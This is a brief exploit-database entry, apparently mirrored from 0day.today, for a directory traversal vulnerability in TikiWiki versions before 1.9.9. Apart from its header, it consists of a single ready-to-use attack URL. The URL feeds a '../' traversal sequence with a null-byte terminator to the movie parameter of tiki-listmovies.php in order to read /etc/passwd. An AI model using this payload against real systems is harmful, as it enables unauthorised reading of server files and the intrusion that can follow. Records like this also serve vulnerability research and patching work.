id: 2519
date: 01/20/2008
title: TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal Vulnerability
author: Sha0
cves: 

======================================================================
TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal Vulnerability
======================================================================




TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal Vulnerability

http://www.vulnsite.com/tiki-listmovies.php?movie=../../../../../../etc/passwd%001234





#  0day.today [2023-03-23]  #